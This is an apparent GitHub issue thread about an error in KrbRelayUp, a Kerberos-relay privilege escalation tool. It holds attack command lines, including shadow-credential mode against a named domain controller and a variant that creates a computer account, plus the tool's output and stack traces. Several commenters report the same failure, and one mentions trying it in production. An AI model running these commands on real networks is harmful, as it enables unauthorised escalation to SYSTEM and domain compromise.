### ISSUE TITLE
A security package specific error occurred.

### ISSUE THREAD

**Issue by sm00v** [Dec0ne/KrbRelayUp#24]
KrbRelayUp.exe full -m shadowcred --ForceShadowCred -dc mwdc1.midwest.local -p 2869 -cls 708860E0-F641-4611-8895-7D867DD3675B
KrbRelayUp - Relaying you to SYSTEM

[+] Rewriting function table
[+] Rewriting PEB
[+] Init COM server
[+] Register COM server
[+] Forcing SYSTEM authentication
[+] Got Krb Auth from NT/SYSTEM. Relying to LDAP now...
[+] LDAP session established
[+] Generating certificate
[+] Certificate generated
[+] Generating KeyCredential
[-] System.ArgumentNullException: Value cannot be null.
Parameter name: owner
   at DSInternals.Common.Validator.AssertNotNullOrEmpty(String value, String paramName)
   at DSInternals.Common.Data.KeyCredential.Initialize(Byte[] publicKey, Nullable`1 deviceId, String owner, Nullable`1 currentTime, Boolean isComputerKey)
   at DSInternals.Common.Data.KeyCredential..ctor(X509Certificate2 certificate, Nullable`1 deviceId, String owner, Nullable`1 currentTime, Boolean isComputerKey)
   at KrbRelayUp.Relay.Attacks.Ldap.ShadowCred.attack(IntPtr ld)
   at KrbRelayUp.Relay.Ldap.Relay()
[-] LDAP connection failed
System.Runtime.InteropServices.COMException (0x80070721): A security package specific error occurred. (Exception from HRESULT: 0x80070721)
   at KrbRelayUp.Relay.Ole32.CoGetInstanceFromIStorage(COSERVERINFO pServerInfo, Guid& pclsid, Object pUnkOuter, CLSCTX dwClsCtx, IStorage pstg, UInt32 cmq, MULTI_QI[] rgmqResults)
   at KrbRelayUp.Relay.Relay.Run()

**Comment by jsdhasfedssad** [comment]
I get this error too...

<img width="1261" alt="krbrelayup1" src="https://user-images.githubusercontent.com/97032878/218319151-1698266c-e692-42b9-8eba-4e1000111798.png">

**Comment by GalacticMaster** [comment]
I am also facing same error .\KrbRelayUp.exe relay -Domain test.domain.com -CreateNewComputerAccount -Computername test$ -ComputerPassword Password@123!

**Comment by konghv** [comment]
I am also facing same error. Did Anyone fix that ?

**Comment by JBalanza** [comment]
Exactly same error here too. I guess no one has any clue about it

**Comment by Gelzki** [comment]
Does anyone already have a solution for this?

**Comment by surajpkhetani** [comment]
I get the same error too. Works on my test environment but did not work in prod. Will try to dig into it.
